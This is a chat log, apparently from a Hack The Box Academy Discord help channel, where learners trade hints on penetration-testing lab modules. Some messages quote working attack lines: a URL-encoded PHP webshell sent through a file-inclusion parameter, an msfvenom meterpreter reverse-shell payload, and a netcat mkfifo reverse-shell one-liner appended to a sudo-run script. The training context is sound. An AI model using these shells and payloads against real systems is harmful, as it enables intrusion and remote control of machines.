Hi, does anyone know how to enable CPE credits under the VIP account? I don't seem to have the option at all

settings -> private information -> vault

Cool.. Thank you

what?

also if you are using sqsh, you have to type "GO" and run it to execute the query that you had prepared

im using mssqlclient but simple sql statements dont work

A general question regarding all the MSSQL questions. Is there a way to get align the output in impacket-mssqlclient? For example when i try to view data in tables the output get's all scrambled, making it very hard to read. Or is my impacket-mssqlclient just broken??

Hi

HI,
On Password Attacks Lab - Hard
I download the vhd file but the file is empty.
I looked at several resources to mount a vhd file and I have a problem installing the libguestfs-tools lib.
If anyone has any clue on the correct way to download the file and mount it.
The only way I found to upload the file is with smbmap :
smbmap -u user -p password -H 10.129.15.198 --download .\user\file.vhd

I used Remmina to mount a local folder and then on the Windows Box you can navigate to \\tsclient\<your folder>

Can you elaborate on this a bit more? Right now i'm trying sqsh instead of impacket-mssqlclient and for example i'm trying to view databases, so i did:

SELECT name FROM master.dbo.sysdatabases

GO

But nothing happens.

and i cant find the mssqlsvc user in the database

ow nvm, i forgot ';' at the end

have a look at responder

with reminna i can just connect with the first user, with d*** it doesn't work ...
On the forum other people downloded the file in smb.
I think is the good method no ?
I need to download the vhd and mount it for find the administrator password.

When i'm connect xith the first user the tsclient is empty.

Can anyone help me please ?

I'm still struggling with dsquery🫠 anyone free for a dm so I don't spoil the question? It's the last question of laying off the land in AD Enum & Attacks. Using dsquery and ldap to find the flag in the description of a disabled account with admin privileges

How do I get a gui too see nessus in the vuln assessment module? It seems like it should be run from the target machine, not the attack box, but xfreerdp doesn't work

Navigate to the web interface at the end of this section and log in with the provided credentials.

So, https://TargetMachineIp:8834 ? That times out for me

Right, nvm. Discord added the final / for me but I hadn't done that in the address bar, that's why it didn't work

Thanks @rustic sage

(the earlier section "getting started with nessus" mentions ip and port but not that it's required to add a slash are the end)

.. Actually it doesn't work at all now, even after resetting

Sorry my mistake, d* user cannot login with ||RDP||, I was able to dowload the file with smbclient I mounted it on a Windows machine, not quite sure how that would work on Linux

yo thanks for this man. I was stuck on this for 2 days had to search thru this history.

should've been taught in the modules

Hello

Yes it's not possible with rdp.
I tried with smbclient but it didn't work and with smbmap the file is empty
I will try again with smbclient
I will try to see if it is easier to mount the file on a windows machine

find a way to mount smb, as the file is quite big it will likely timeout and corrupt the file transfer

Hello

Hello

Anyone here good with PS Empire

Hey

crackmapexec smb 10.129.2014.178 -u robert -p 'Inlanefreight01!' -M empire_exec -o LISTENER=http
/usr/lib/python3/dist-packages/paramiko/transport.py:236: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
EMPIRE_E...                                         [-] Unable to connect to Empire's RESTful API: HTTPSConnectionPool(host='127.0.0.1', port=1337): Max retries exceeded with url: /api/admin/login (Caused by SSLError(SSLZeroReturnError(6, 'TLS/SSL connection has been closed (EOF) (_ssl.c:997)')))

I am gettin g this error

Have confirmed the API is running

🔥

Hey guys, I hope this is the right place to ask this. I just completed the LFI module in the academy and just had a question about URL encoding. When do you know to URL encode vs when to not? For example we encode the webshell "/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E" but not the COMMAND: ?language=/var/lib/php/sessions/sess_rq2rp1ehi08i58doec2adragi4&cmd=id. Thanks and sorry if thats a long block of text!

Your dropping too many fire courses on the nations. Show us mercy 😁

💪

Is it normal that I have to keep resetting the targets all the time? For example on the Nmap-module, after each scan the target becomes unresponsive and I have to reset it. This system seems to have major stability problems when compared to other similar sites

no its not normal. try resetting the vpn connection. only time i have to reset a target is from running out of time on it

File Upload Attacks - Type Filters: Can anyone give a nudge? I am able to upload a file but not able to get the directory to properly execute the php code.

have you tested your nested extensions?

lots of web modules recently

web is too big

Yes, I run intruder on the wordlist made from the bash script(added phar and phtml) and get multiple 193 codes. But when I visit that page it says 404 even though the initial request stated it went through.

also you have modified the content-type right?

and you have added some magic bytes as well?

The only magic byte that I have been able to get successful is || GIF 8 and I change the content type to image/jpg, image/png, and image/gif. ||

so far so good, try to focus on the filename extension

Ye, I know I'm close just tryna figure out what last part is wrong. Gonna take a break for a couple mins to reset the brain lol

yup, thats a good idea

my flag at attacking common service doenst work dns section

check for white spaces

i already checked

When will the job-role path be added?

Hello! Everyone I am new here

Hi, I need some help for Pivoting, Tunneling, and Port Forwarding module, in the Skills Assesment. How do I transfer the Mimikatz to 172.16.5.35? I cant seem to ssh from either attack host or foothold host. Thank you.

my college domain is not registered on HTB website !! how would i take student pack

It makes no sense to ask the same question in different channels

okh sry

When using xfreerdp you can copy and paste files from your attack host to the target. (unless its disabled, which it isnt in the case of the skill assessment)

anyone available for this?

What is the type of the service of the ''syslog.service"?

I wrote systemd service

But it's wrong

you can either like Skippydoo said use xfreerdp and the /drive: tag to mount a directory on your machine as a shared network drive on the target machine or another method is upload the Mimikatz file on to the first machine that already have a website running and then from that machine just use wget from the first one

sure shoot me a dm if you still need help

what module and section are you on?

I'm not going to give you the answer but if you search the man pages of systemctl you'll see a parameter you can use to help you

it's an addition to the new Linux Fundamentals

oh yeah i did saw that module got some update but i haven't done that 🤣

So can someone answer this

try systemctl or jorunalctl, maybe systemd

With the htb academy modules

When there is an update with a module

U can see that in blue at the right top

Is an update always a nee section

Or could it also be a old section that is updates

And if so how do i know what is new?

When an update is a whole new section ots clear

in the changelog

Ai tnx

@cunning prairie

How do I find nessus on the instance running? I'm completing the vulnerability assesment module, but not seeing nessus. Also not seeing the prepopulated scan results anywher

Hello there, i'm at the start of the windows fundementals Module, but it seems i've got some issues with xfreerdp, i can't connect most tries, and even when it connects then i'm getting cut off after a minute or so

Check that you don't have a pwnbox instance open at the same time you're connected via openvpn.

Hi. Can anyone help me with "Getting Started Privilege Escalation" ? I have made it to user2 and find id_rsa. I copied the content of the id_rsa and created a file on my computer with the same name and content.

On victim's machine
Cat id_rsa
Copy the content from id_rsa

On my machine
Vim id_rsa
Paste the content
Chmod 600 id_rsa
i try to connect ...
||└─$ ssh user2@165.227.228.154 -p 30076 -i id_rsa
Load key "id_rsa": Permission denied||

What am I doing wrong?

still need to enter the password for user2

@autumn pilot Hey, may I ask, is PNG apart of any of this?

@wintry lark What are the permissions on the id_rsa file?

Hey thanks for the info, yeah Openvpn was still running, but the issue is still the same, even after killing the openvpn process. I also tried via the browserversion of the pwnbox, but there a get another error:
[18:59:14:690] [4992:4992] [ERROR][com.freerdp.client.x11] - failed to open display: :1
[18:59:14:690] [4992:4992] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

I've done it with gif

Hmm... I've never encountered that error. I've had a similar issue from the one you described where my connection would cut off and then come back on after a while and discovered that it was because I was connected with openvpn and had a pwnbox running at the same time, so I thought that might've been it.

I'll try again later, with a new instance, maybe it'll work then

-rw-r--r-- 1 root root 2602 Feb 12 2021 id_rsa

@wintry lark run the command on sudo, or change it permissions. But when ssh goes to grab to use that file it has to have certain permissions for you to execute but also cannot be to exposed permission wise.

Hey there!
I stuck for a few days on Weak Public/Private Keys section of the Attacking Authentication Mechanisms module 😐 , still can't receive the JWT from the response.

I have:
imported pub.crt and privat.pem;
changed logged in username value to hackme;
assertions successfully signed

however my request still attempting to redirect me back to the root web directory.

Can someone tell me what have I missed ?

Can someone help me with this question: Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer. - In Web Service and API attacks - Information Disclosure (with a twist of SQLi)

I´'ve tried searching for this exact ID and the area around it with the script but finding nothing

Did you already find a vulnerable parameter?

thanks:) i caputered the flag...i used the wrong user :/ but your hint to check the permission shown me the right user 🙂

Find a vulnerable parameter and apply a basic SQLi statement!

i have a new hatred for MSSQL

Yes it's the same as in the example, however when I try to search for it with the python script with the position 736373, I get nothing

try different tools. ffuf worked for me

How do I use dsquery to search for a user with administrator privileges and disabled for the Active Directory module

I can search disabled accounts easily I just don’t know how to search for admin perms and googling ad help is hard

But I got the parameter with ffuf, Now I'm trying to find the person in position of 736373 using this parameter that I found

@autumn pilot Can I dm ya?

sure

Can you show me your output in the dm?

Hola y'all

there is something wrong with target alive time. It says 90 minutes when i spawn it after 10 minutes its down to 30 or something like that

Has anyone gotten the LOGIN BRUTE FORCING Skills Assessment - Website to boot up? The IP + port it indicates doesn't show up. I have been resetting for a while now

I have done that assignment yesterday, without any probs

It might just be malfunctioning then. Tried it inside the parrotvm instance and on my own machine

hmm, I can try in a bit tho!

Maybe HTB is getting overloaded by people bruteforcing 😆

The password bruteforcing should really be dialed back. It seems like a staple of every module

which SA are you doing, since you have 2 SA's? @rich light

Linux fundamental. Task scheduling

The first one

I am able to reach it tho

Hmmm.. That is annoying

Am I blocked

It is a public IP after all

It's public IP.. you should be able to use this iP + Port as well.

Alright, resetting again got it to finally work

@dim hound Thanks for the second set of eyes

No worries! Good luck 😁

Atm I am re-doing broken authentication tho! I do think that's one of my fav

I planned my exam (CBBH) at the 17th of April

I try much and also don't found

look through the man pages. There is a parameter you can use to return what type the service is.

if you still can't find it feel free to DM and I'll help you

I had trouble with this earlier. If you still need help feel free to DM

hey guys, i hope yall doing well, so i've been trying to do this question, but i cant even do the nmap scan, is there something i am doing wrong

the question is "Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)" from the getting started module

Can someone help me with this, it's exactly like in the instructions, and I'm supposed to find the position: 736373 -

Shouldn't I see it if I replace the number with the one I'm looking for ?

Has anyone done the ACL Enumeration section of AD Enum and Attacks and remembers how many rights forend has over the GPO Management group? Bloodhound shows only 2 for me and neither work as answers... Curious if I'm doing something wrong or if Sharphound missed something

Could you fix the problem?

Yeah

Nice

That's Notify service

Can someone help with attacking email services

Found pass for m*****

Logged in

But dont seem to find email

it is not that easy. If you don't have an antivirus that can detect the malware and remove it, you need to do some forensics. Use wireshark , a process monitor, review some log files to start with in order to identified the malware file. Once you identified it, you need to reverse engineer it to try to figure out all the objects is drop into your system and what it does. Once you know, it makes it easier to figure out what to do to remove it. The easier thing would be to reload a backup if you have one.

Thank you!

I solved this with help of the Internet, but if anyone is available to explain the process I'd much appreciate it🙏

Can someone help me with the File Upllad Attacks - Skills Assessement. I fuzzed. I read the source code for index and upload and located the upload directory. I get the following error when trying to visit my upload:

"The image "http://Path_To_Upload_Directory.jpeg" cannot be displayed because it contains errors."

Can someone give me a hint please?

hello in the Pivoting, tunneling, and portforwarding module I have a problem specifically in "SOCKS5 Tunneling with Chisel", I am trying to run chisel but I have the following error: ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.4' not found (required by ./chisel),
I was trying to download old versions and I still have the same error, any ideas?

any help with question, "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). i have tried everything and steel not working

Amd openssl is not working

Help

Can someone help me with the vulnerability assesments module? Nessus isn't on the pwnbox. How am I supposed to complete the nessus skills assessment?

Openssl is not working and ports 993 and 995 are filtered

You should first list the Module name. Then section. Then question.

Also search the question in the discord before asking. I also like to google too.

Password attack , PtT for linux , question 8 .

Anyone here running nethunter termux? Can't get the vnc server to connect

I can try to help. DM me

THIS IS SPARTA

are you using a VM? or just the pwnbox?

Forget it its done

this one you need to pay attention to the principle in the klist of the system keytab

it's web-based

How do I access it?

Navigate to the web interface at the end of this section and log in with the provided credentials. Read the requirements section before jumping to the question

I did read it. I don't understand how to navigate to the web interface. the modules didn't talk anything about that

a web-based gui. once you start the nessus service you go to localhost:<theportitgivesyou>

in firefox

you start the server at the bottom and go to http://<ip>

oh sorry yea the ip for the machine. localhost is for running on your own machine

I get an unable to connect page when I navigate to the ip address given

did you do the port as well? should be ip:port

I contacted support and they said to use port 8834, but I still get the unable to connect page

I just tried it again and now it says Bad Request

Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead, please use the HTTPS scheme to access this URL.

restart the machine. then in firefox go to http://ip:8834

well try https.

I just tried https and it worked!

Thank you!

np

I'm having the same issue now with openvas. Does anyone know the port i navigate to? I tried 9392, but that didn't work

it should be the same thing just a different port. error?

can someone please help me with broken auth skills assessment... I have the user and password but unable to change the cookie.................got it sorted

Hello. I really need help with Attacking Common Services Hard. I wanted to do all modules by myself but after spending 2 weeks of research, I'm literally beating my head against the wall. So far, I know that I need to impersonate the *admin on the linked mssql server to enable xp_cmdshell. The problem is I'm not able to find the correct syntax. Is there a good Samaritan to give me a hint please?

Nevermind. After asking my question, my brain waked up and I finally caught it.

can I get a nudge on the getting started module knowledge check? I am trying to obtain the root flag. I downloaded LinEnum.sh, and ran it using "bash LinEnum.sh", but all it resulted in was a bunch of text to the terminal then scan complete

you have to read the results, it'll come back with what it found, from there you can look for processes or other exploits. usually the best results are towards the end of the report

It's just a bunch of file names, not finding anything of interest. And I didn't even see root.txt listed

I don't see any processes or other exploits listed

I found the section of user can run the following commands, but it just says ALL

May I have some help with Pivoting, Tunneling, and Port Forwarding - Meterpreter Tunneling & Port Forwarding. I'm trying to utilize the meterpreter payload shown in the module to attempt to receive a meterpreter session. I keep on receiving the following and the command shell session gets closed immediately.

hey anyone can guide me regarding bug bounty

Make sure you're using the correct one, windows/Linux, reverse http/tcp

could i dm please

i need some help

http://dontasktoask.com

Utilizing the following payload:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.37 -f elf -o backupjob LPORT=8080

Help with ehat

Hey there!
I stuck for a few days on Weak Public/Private Keys section of the Attacking Authentication Mechanisms module 😐 , still can't receive the JWT from the response.

I have:
imported pub.crt and privat.pem;
changed logged in username value to hackme;
assertions successfully signed

however my request still attempting to redirect me back to the root web directory.

Can someone tell me what have I missed ?

Shouldn't that be reverse http? If I'm remembering that module correctly?

Specificy using Linux/x64/reverse/TCP iirc

If that's what it's expecting

I've never seen syntax "http" utilized in msfvenom payloads before. I will give that a shot. Where should the http syntax be added to? Also usure of the "iirc" sytax or if that was a typo.

Iirc stands for "if I recall correctly"

in need of a nudge in the metasploit module if anyone could assist

Instead of reverse_tcp, reverse_http

That section though I think walks you straight through it

Hi all,
I'm in the Active Directory Enumeration & Attacks, Attacking Domain Trusts - Child -> Parent Trusts - from Linux section. ||I'm very confused by this lab. I've tried to get the NTLM hash for user bross by doing what is decribed in the section text, but it seems to be targeting the child domain and not the parent domain? So I tried targeting inlanefreight.local and freightlogistics.local but neither htb-student or htb-student_admin seems to exist on those domains. Using nmap I found that 172.16.5.240 is logistics.inlanefreight.local so if I want to hit the parent domain I will need a completely different IP address? How do I find this IP? Why are there no enumeration/recon section for the Linux section? Am I even on the right track?||

Thank you @fathom pendant I will give that a shot and thank you for adding to my acronym vocabulary 😃

@magic valve could i get an assist on the metasploit module?

please

could i ask

Help with what? You haven't asked your question

iam confused with this secrion

I am doing the pentesting path a little out of order and have not completed the Metasploit module as of yet.

That is the most verbose question

It tells you exactly what to do

i have tried but doesnt give me anything

looks wrong

what i have done

It tells you you have an incomplete cookie and to fuzz it until you get one that works

how to do it the right one

please could you check mine

the right way to fuzz from hash last letter after that to encode

No, I haven't done that one, but I'm sure someone who has done it can answer your question better, in the meantime, reread the section

anybody done that please inform me

Anyone help me with: WEB SERVICE & API ATTACKS -- I need to use SQLi to get 'user that has a position of 736373' There is no mention or example of SQLi in the chapter, the instructions in the section does not seem to have anything to do with this task

this part: https://academy.hackthebox.com/module/160/section/1474

Anybody help me..wt is the type of service is 'syslog.service'.

Google

anyone that has done AD Enumeration & Attacks - Skills Assessment Part II? I need a nudge on Q8

You want to utilize the user from Abusing ACLs to retreive bross's hash. Let me know if you need anymore help after this hint.

Utilize lazagne.exe at the beginning. Let me know if you are past that/need more hints

my flag doenst work

Hi could someone help me for Command Injections - Skills Assessment ?

can someone help me with the gettingstarted knowledge test?

can i DM someone?

Okay so this cant be hard, Hacking Wordpress - Login
I'm curling <methodCall><methodName>system.listMethods</methodName><params></params></methodCall>
But the response I'm getting I'm not understanding how this is showwing me the list of methods?

hi

IS THER ANYONE WHO KNOWS HOW TO OPEN A PASSWORD PROTECTED WORD DOCUMENT WITHOUT PASSWORD

if anyone knows, please let me know

it's very urgent

What do you need help with? I got the first flag, but still working on getting root

@tight mesa which problem are you facing

getting root on getting started knowledge check. I got a shell using metasploit, then used LinEnum.sh, but didn't get any good info from that. There was a section that said get sudo priviledges that just said ALL

@tight mesa use sudo -l

@tight mesa what do you see

User htb-ac482683 may run the following commands on htb-faqemo2psd:
(ALL) NOPASSWD: ALL

what options did you set on the metasploit exploit?

rhosts to target ip and lhost to my ip

just that?

@tight mesa switch to root

which exploit are you using?

i did sudo -i outside of the meterpreter shell, and it switched to root, but when i search root.txt, it says no file or directory found

getsimple

nvm i got it working

Use cat /root/root.txt

it was apparently just an internet problem

says no file or directory found

glad you figured it out!

Can someone help me on the Internal Password Spraying - from Windows?
Can't rdp. xfreerdp just shows the window all black. rdesktop says the credentials are incorrect 😂 . Iam able to use evil-winrm but the DomainPasswordSpray tool just freezes.

These are the directories I have access to: Desktop Downloads Music Public Templates
Documents go Pictures roobee Videos

@tight mesa return to home directory

@tight mesa how many users do see

okay, I navigated to the home directory and i only see user htb-ac482683

@tight mesa what about sudo su

nothing happened when I was already root user, so i'm going to restart msfconsole and use sudo su instead of sudo -i

okay i used sudo su and i'm getting the same result. no root directory, no file found with cat /root/root.txt

@tight mesa use whoami to see who you are on the system

says i'm root

@tight mesa ok use locate or find to find the flag using wildcard

I use find root.txt and it says no file or directory found

what's wildcard?

@tight mesa like using *

I did find -name root.txt this time and it said this: find -name root.txt
find: ‘./htb-ac482683/.cache/doc’: Permission denied

@tight mesa use locate *.txt

@tight mesa anything

a bunch of files, but no root.txt

I have to go soon, ugh I feel like I'll never crack this

I'm going to post in the htb forum

@tight mesa you can do it 💪 use pwd which directory are you in

so I reset the pwnbox and root directory popped up! When I did locate root.txt, the file that popped up was just a word list, so I'm going to do some searching, but I think I might be onto something!

@tight mesa can you dm me with the screen shot

Hi, im working on Attacking Common Applications - Skills Assessment II , but i stuck on this question: What is the admin password to access this application? any tips/ ideas ?

hello, i am doing the getting started module and the nibblers box, it says that it doesnt need a password for executing a monitor.sh file, but when i do it it asks for the password

'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh 

this was appended to the monitor.sh file after gaining the initial access as told by the module to do so, but while doing sudo /home/nibbler/personal/stuff/monitor.sh
error comes:

'unknown': I need something more specific.
/directories/ [[: not found

and when i do normal sudo it asks for a password, but according to the module this wasnt supposed to happen

posted this in #1083005652147904562

in the modules like footprinting SMB part, there is commands as examples like we have to do them like an exercise but the ip doesnt resolve to anything

the practice is only the questions at the end??? or we must follow the examples like this

May be helpful to watch Ippsec’s video on nibbles.

@lyric raft yeap look for the version of snmp

@lyric raft no

@lyric raft use nmap

alright

HI,
For the module attacking commom services in Attacking SQL Databases.
I am connected with the given identifiers except that I have no access to anything.
When I list the users I can't even find htbdbuser and I can't find mssqlsvc either.
I'm a bit lost when I do select user_name() apparently I'm a guest but when i do SELECT * FROM flagDB.INFORMATION_SCHEMA.TABLES; i have this response :
The server principal "htbdbuser" is not able to access the database "flagDB" under the current security context.

@lyric raft did you scan the udp

@lyric raft the version cannot be different

because the user isnt allowed

in the db is a user that is allowed

@lyric raft yes

@lyric raft that is the version

im stuck at the easy lab common services i cant get access to the server what am i missing?

i tried to brute force ftp mysql rpd

Thanks
I don't really understand how i can change the user.
We don't have other credentials.
In the course everything is mixed up i'm lost on this part.

hellou

im trying to solve a module but i have problems

can somebody help me?

this is the exercise Crack the following hash using the rockyou.txt wordlist: 0c352d5b2f45217c57bef9f8452ce376

this is what im doing sudo hashcat -m 0 '0c352d5b2f45217c57bef9f8452ce376' /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz

you need to fix your rockyou file

Fix: extract it

It's still a gzip archive

thank u

it works

still stuck

pls help

@rustic sage worth knowing about: https://superuser.com/questions/1387114/using-hashcat-to-load-a-compressed-wordlist

Hey, I am on the skills assesment part of the CrackMapExec module.
"Your first task is finding a valid account and trying a common password using different protocols."
I have tried all protocols - local and domain login
with all usernames and passwords that were mentioned during the course training,
I haven't had a single hit yet.
The hint says: Review "Exploiting NULL/Anonymous Session", what can you use to enumerate users?
I still get access denied when trying any of these methods.

A nudge would be helpful if possible

For SHELS AND PAYLOADS: LIVE ENGAGEMENT
Hi guys, I am currently stuck on host 1. I am unable to upload a .war file onto the target. I tried everything - online scripts, msfconsole and whatnot. I do not have a browser on the attacker machine which makes things a lot harder since I am unable to upload to tomcat manager with 'curl'. Any help would be greatly appreciated.

we need to use the ||spawned target as a pivot host, then use proxychains crackmapexec to target the machines in the internal LAN||

I opened up Burpsuite and used their browser lol. I couldn't find a browser on the machine either

for shells and payloads we can launch firefox from the command line

good to see you jared

Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer.

i have found how to decode the HTBPERSISTENT cookie

how do you reencode back after modifying the value?

Shells & Payloads Laudanum, struggling with 2nd question, I've submitted a few and none are right

Can someone please help me with SQLmap skill assessment 🙂

https://academy.hackthebox.com/module/144/section/1257 - I am having a hell of a time finding the flag for question #3. Any tips?

To be more specific Information Gathering - vhosts question#3